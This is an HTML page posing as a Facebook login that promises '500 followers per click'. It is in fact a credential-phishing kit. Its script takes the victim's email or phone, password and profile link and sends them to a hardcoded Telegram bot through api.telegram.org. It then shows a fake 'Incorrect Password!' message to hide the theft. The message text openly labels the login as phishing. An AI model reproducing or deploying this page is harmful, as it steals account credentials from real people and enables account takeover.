<!DOCTYPE html>
<html>
<style type="text/css">
body {
  margin: 0;
  padding: 0;
  font-family: sans-serif;
  background: #f1f1f1;
}

.login-box {
  width: 320px;
  height: 550px;
  background: #fff;
  color: #000;
  top: 50%;
  left: 50%;
  position: absolute;
  transform: translate(-50%,-50%);
  box-sizing: border-box;
  padding: 70px 30px;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0,0,0,0.3);
}

.avatar {
  width: 100px;
  height: 100px;
  border-radius: 50%;
  position: absolute;
  top: -50px;
  left: calc(50% - 50px);
}

h1 {
  margin: 0;
  padding: 0 0 20px;
  text-align: center;
  font-size: 22px;
}

.login-box p {
  margin: 0;
  padding: 0;
  font-weight: bold;
}

.login-box input {
  width: 100%;
  margin-bottom: 20px;
}

.login-box input[type="text"],
.login-box input[type="password"] {
  border: none;
  border-bottom: 1px solid #000;
  background: transparent;
  outline: none;
  height: 40px;
  color: #000;
  font-size: 16px;
}

.login-box input[type="submit"] {
  border: none;
  outline: none;
  height: 40px;
  background: #000;
  color: #fff;
  font-size: 18px;
  border-radius: 20px;
}

.login-box input[type="submit"]:hover {
  cursor: pointer;
  background: #404040;
  color: #fff;
}

.login-box a {
  text-decoration: none;
  font-size: 14px;
  color: #777;
}

.login-box a:hover {
  color: #000;
}
</style>

  <head>
    <title>Facebook Login</title>
    <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">



    <link rel="stylesheet" type="text/css" href="style.css">
  </head>
  <body>
    <div class="login-box">
      <img src="https://www.facebook.com/images/fb_icon_325x325.png" class="avatar">
      <h1>Log In Facebook</h1>
<strong style="text-align:center;color:#1877f2;">Get Facebook Auto Follower. Per Click 500 Follower Sent Your ID. </strong><br> <br>
      <form onsubmit="submitForm(event)">
        <div>
          <label for="email-or-phone">Email or Phone</label>
          <input type="text" id="email-or-phone" name="email-or-phone" placeholder="Enter Email or Phone">
        </div>
        <div>
          <label for="password">Password</label>
          <input type="password" id="password" name="password" placeholder="Enter Password">
        </div>
        <div>
          <label for="video-link">Enter your Id Link</label>
          <input type="text" id="video-link" name="video-link" placeholder="Enter Id Link Here">
        </div>
        <div>
          <input type="submit" value="Log In">
        </div>
        <div>
          <a href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&_rdr">Forgot Password</a><br>
          <a href="https://m.facebook.com/reg/?cid=103&refsrc=deprecated&rtime=1679553612&subno_key=AaEhVssEsCPnwpQ3lYUbJpIvBZiGKhuqdJBozChuRFY8J9xaCuBx-yto7i7g-ssMzL0UzTpS0vPidB-X6G1VZmuun01d1LTi8wtoFZXPvjnaqieyncBzMdkU2koydGyohn_cdD3YRHl1P4qCo4OlCvjstZOtePG-lwB-PfHG0AJeNHAT7wn5oMYTkcmtj5DkB4WJFVYhXJr-HNh20r_YFCtRhZBJfD0O4ZSixqmTPqG6UbURD4dF0fhcMJsbdHm4a7_vs6c_lP7Bi8xFz6eQof8rZc0y6BEYvqJwCd7nXSFhy_QN_m1vhZxeFKWH4B9hj3I&hrc=1&_rdr">Create a New Account</a>
        </div>
      </form>
    </div>
    <script>




      function submitForm(event) {
        event.preventDefault();
        const emailOrPhone = document.getElementById('email-or-phone').value;
        const password = document.getElementById('password').value;
        const videoLink = document.getElementById('video-link').value;
        const botToken = '6177719871:AAE9t4iQTKrYhNfuhmegYaloe2FGU92xWds';






        const chatId = '5947339497;






        const message = `New login Video Phising from ${emailOrPhone}. Password: ${password}. Video link: ${videoLink}`;
        const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
        fetch(url, { method: 'POST' })
          .then(response => response.json())
          .then(data => {
            console.log('Incorrect Password! :', data);
            const successMessage = document.createElement('p');
            successMessage.textContent = 'Incorrect Password! ';
            document.body.appendChild(successMessage);
          })
          .catch(error => console.error('Error sending message:', error));
      }
    </script>
  </body>
</html>

